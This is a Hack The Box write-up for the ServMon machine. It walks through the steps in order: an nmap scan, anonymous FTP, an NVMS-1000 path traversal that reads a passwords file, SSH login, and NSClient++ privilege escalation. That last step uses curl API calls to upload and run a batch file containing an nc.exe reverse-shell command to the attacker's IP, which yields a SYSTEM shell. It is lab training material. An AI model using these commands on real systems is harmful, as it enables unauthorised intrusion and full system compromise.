24th October 2020

Hack The Box – ServMon – 10.10.10.184

Monitoring is not protection

About ServMon

This post is a write-up of the machine ServMon from Hack The Box, an online platform for practising and advancing your cybersecurity skills.

ServMon is rated ‘easy’. Submitting the user.txt flag is worth 10 points and submitting the root.txt flag 20 points.

Foothold
The port scan shows some interesting open ports: 21/tcp (FTP), 80/tcp (HTTP) and 8443/tcp (alt-HTTPS). Anonymous FTP login is allowed, and in Nadine's folder I found a note to Nathan saying that a ‘Passwords.txt’ file has been left on his Desktop. The NVMS-1000 web application on port 80 turned out to be vulnerable to path traversal.

User
Through the path traversal I read ‘Passwords.txt’ from Nathan's Desktop. One of those passwords worked for Nadine over SSH, which gave me the user flag.

Root
Port 8443 runs NSClient++. The installed version has a known privilege-escalation issue: with the web administrator password, anyone who is allowed to reach the API can drop a revshell.bat into the scripts folder and have the service execute it. The resulting reverse shell runs as Local System.

Machine Info

Hack The Box ServMon machine info card (machine IP and creator)

Recon

Port scan

As always, start with an Nmap port scan. Note that -oA takes a base name and writes three files (.nmap, .gnmap and .xml), so the .txt suffix below simply ends up as servmon.txt.nmap and so on.

~$ nmap -sC -sV -oA ./nmap/servmon.txt 10.10.10.184

The results of the port scan.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-11 15:14 EDT
Nmap scan report for 10.10.10.184
Host is up (0.063s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst:
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp   open  http
| fingerprint-strings:
|   GetRequest, HTTPOptions, RTSPRequest:
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo:
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL:
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  napster?
8443/tcp open  ssl/https-alt
| fingerprint-strings:
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest:
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|_    jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.80%I=7%D=4/11%Time=5E921736%P=x86_64-pc-linux-gnu%r(NULL
SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex
SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x
SF:20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20X
SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D
SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.
SF:org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\
SF:x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2
SF:0\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")
SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm
SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\
SF:n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\
SF:x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xh
SF:tml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1
SF:999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x
SF:20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20
SF:\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RT
SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n
SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n
SF:\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\
SF:.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-
SF:transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/x
SF:html\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x2
SF:0<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\
SF:x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=4/11%Time=5E92173E%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation
SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0t\0t\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\x12\x02\x18\0\x1aC\n\x07workers\x12\n\n\x04jobs\x12\x02\x18\
SF:x02\x12\x0f")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x20
SF:18\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.1\
SF:x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(RTS
SF:PRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\
SF:x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\
SF:x2018\r\n\r\nDocument\x20not\x20found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m29s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-11T19:19:20
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 154.74 seconds

There are some interesting ports open:

  1. 21/tcp (FTP)
  2. 22/tcp (SSH)
  3. 80/tcp (HTTP)
  4. 8443/tcp (alternative HTTPS)

Port 5666/tcp is worth a note as well: it is the classic NRPE/NSClient++ agent port, which fits the NSClient++ title nmap pulled from 8443. SMB (139/445) is open too, with message signing enabled but not required.

FTP Anonymous login

Low-hanging fruit first. Anonymous FTP access is allowed, so log in as anonymous; the server accepts any password (by convention it asks for an e-mail address).

~$ ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>

Let’s poke around a bit.

ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:05PM       <DIR>          Users
226 Transfer complete.
ftp> cd users
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:06PM       <DIR>          Nadine
01-18-20  12:08PM       <DIR>          Nathan
226 Transfer complete.

There are two user folders, ‘Nadine’ and ‘Nathan’. From Nadine's folder I downloaded ‘Confidential.txt’ and from Nathan's folder ‘Notes to do.txt’.

Confidential.txt
This is a note to Nathan saying that a Passwords.txt file has been left on his Desktop, and that it belongs back in some ‘secure folder’.

Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Notes to do.txt
Nathan's unfinished to-do list. Items 3 and 4 are still open, which is exactly why this box falls: the passwords file is still lying around and NVMS is still publicly reachable. Item 2, ‘Lock down the NSClient Access’, becomes relevant later on.

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

There are no more files, so let’s move on to the other open ports.

NVMS-1000

Next in line is the HTTP port. Visiting http://10.10.10.184 lands on the login page of NVMS-1000, network video surveillance management software from TVT.

Maybe that already explains the name of this box: ServMon, Surveillance Monitoring?

Hack The Box SerMon NVMS-1000

Some default username and password combinations did not work. Searching around, I found that NVMS-1000 is vulnerable to directory traversal (https://www.exploit-db.com/exploits/47774, CVE-2019-20085): the web server does not strip ../ from the request path, so any file on the drive can be read without logging in.

I checked this with Burp Suite and confirmed the traversal by reading /windows/win.ini, adding one more ../ each time the GET failed. Burp Repeater is the right tool here: browsers and most HTTP libraries collapse ../ segments before the request leaves the client, so the server would never see them; with curl you would need --path-as-is.

Hack The Box ServMon NVMS-1000 Directory Traversal

Ok, now I need to put the pieces together.

Intrusion

Get SSH as Nadine

I know there is a ‘Passwords.txt’ on Nathan's Desktop, and the traversal in NVMS-1000 lets me read it: the same request as before, with Users/Nathan/Desktop/Passwords.txt as the target.

Hack The Box ServMon NVMS-1000 Path Traversal attack

That gives a list of passwords, which I saved locally as ‘passwords.txt’.

passwords.txt

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
[email protected]
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

As SSH is open, I first tried the passwords against Nathan's account, but none of them work for him. Switching to Nadine, I got a shell with the password [email protected].

Grab the user flag, then on to the next step: privilege escalation.

~$ ssh [email protected]
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

[email protected] C:\Users\Nadine>cd Desktop

[email protected] C:\Users\Nadine\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine\Desktop

08/04/2020  22:28    <DIR>          .
08/04/2020  22:28    <DIR>          ..
15/04/2020  20:51                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)  27,418,095,616 bytes free

[email protected] C:\Users\Nadine\Desktop>type user.txt
7f26c77e1ccd17cede33c1b950c26e4e

[email protected] C:\Users\Nadine\Desktop>

Privilege Escalation

Enumeration

Port 8443 (alt-https) is not a default Windows port. https://10.10.10.184:8443 shows the sign-in page of NSClient++. None of the passwords I have work; every attempt returns ‘403 Your not allowed’. That 403 is not a wrong-password response: NSClient++ has an ‘allowed hosts’ setting for its web server and, going by Nathan's ‘Lock down the NSClient Access’ note, access has been restricted (most likely to localhost), so the interface has to be reached from the box itself.

Hack The Box ServMon NSClient++

I already have an SSH session as Nadine, so I can look for the version and the password locally. The NSClient++ documentation (https://docs.nsclient.org/) describes how to display the web administrator password with nscp; the password is stored in nsclient.ini, and the command simply reads it out.

[email protected] C:\Users\Nadine>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\Nadine> cd 'C:\Program Files\NSClient++\'
PS C:\Program Files\NSClient++> .\nscp.exe web password --display
Current password: ew2x6SsGTxjRwXOT

So the password is ew2x6SsGTxjRwXOT. The command below shows the installed version of NSClient++.

PS C:\Program Files\NSClient++> .\nscp.exe --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64

Now I have the product, the version and the web password; this must be the way to root the box. searchsploit confirms there is a known issue for exactly this version.

~$ searchsploit nsclient++
--------------------------------------------- ----------------------------------------
 Exploit Title                               |  Path
                                             | (/usr/share/exploitdb/)
--------------------------------------------- ----------------------------------------
NSClient++ 0.5.2.35 - Privilege Escalation   | exploits/windows/local/46802.txt
--------------------------------------------- ----------------------------------------
Shellcodes: No Result

The exploit-db entry (https://www.exploit-db.com/exploits/46802) explains how to get a reverse shell with Local System privileges: with the web password you enable the CheckExternalScripts and Scheduler modules, register your own script and let the service, which runs as SYSTEM, execute it.

Exploitation

NSClient++

I found out there are two ways to root this box:

  1. Through the GUI
  2. or through the API

I’m new to REST APIs and want to learn something, so I took the API route, which is in my opinion also the easiest way to root this box. The NSClient++ API documentation lists the endpoints. First I removed the ‘curl’ alias in PowerShell: in Windows PowerShell ‘curl’ is an alias for the Invoke-WebRequest cmdlet, and I want the real curl.exe that ships with Windows 10.

PS C:\Program Files\NSClient++> Remove-Item alias:curl

First I checked whether the API answers from the SSH session as Nadine. This time the request comes from localhost, so it is not blocked with a 403. It works:

PS C:\Users\Nadine> curl -k -u admin https://localhost:8443/api/v1
Enter host password for user 'admin':
{"info_url":"https://localhost:8443/api/v1/info","logs_url":"https://localhost:8443/api/v1/logs","modules_url":"https://localhost:8443/api/v1/modules","queries_url":"https://localhost:8443/api/v1/queries","scripts_url":"https://localhost:8443/api/v1/scripts"}

CheckExternalScripts and Scheduler are already enabled, so all I have to do is place a script in the ‘C:\Program Files\NSClient++\scripts’ directory through the API and run it. The PUT below writes a one-line batch file named ‘revshell.bat’ whose content is the request data. It calls nc.exe, which I had already copied to ‘C:\Temp’ (scp over the existing SSH access will do).

curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/revshell.bat --data-binary "C:\Temp\nc.exe 10.10.14.42 4444 -e cmd.exe"

The uploaded script is exposed as a query named after the file (revshell for revshell.bat), and this request executes it:

curl -s -k -u admin https://127.0.0.1:8443/api/v1/queries/revshell/commands/execute?time=3m

The reverse shell is established and I can now grab the root flag.

~$ nc -lvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.184.
Ncat: Connection from 10.10.10.184:50184.
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
whoami
nt authority\system

C:\Program Files\NSClient++>type "C:\Users\Administrator\Desktop\root.txt"
type "C:\Users\Administrator\Desktop\root.txt"
d3d0930a47b35c8ae6ff3689411bf7ad

C:\Program Files\NSClient++>

Did you enjoy this write-up as much as I did? Please consider spending a respect point: https://www.hackthebox.eu/home/users/profile/224856

Happy hacking!

T13nn3s

I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.
